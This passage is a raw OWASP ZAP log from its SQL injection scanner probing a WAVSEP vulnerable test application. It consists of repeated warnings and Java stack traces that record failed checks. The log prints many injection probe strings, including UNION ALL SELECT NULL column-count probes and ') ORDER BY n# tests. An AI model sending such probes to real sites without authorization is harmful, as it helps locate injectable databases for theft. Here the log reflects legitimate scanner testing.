org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681475 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681476 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681476 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681477 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681478 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681479 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681479 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681480 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 9043#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') ORDER BY 9043# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681481 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681482 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681483 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681483 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681484 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 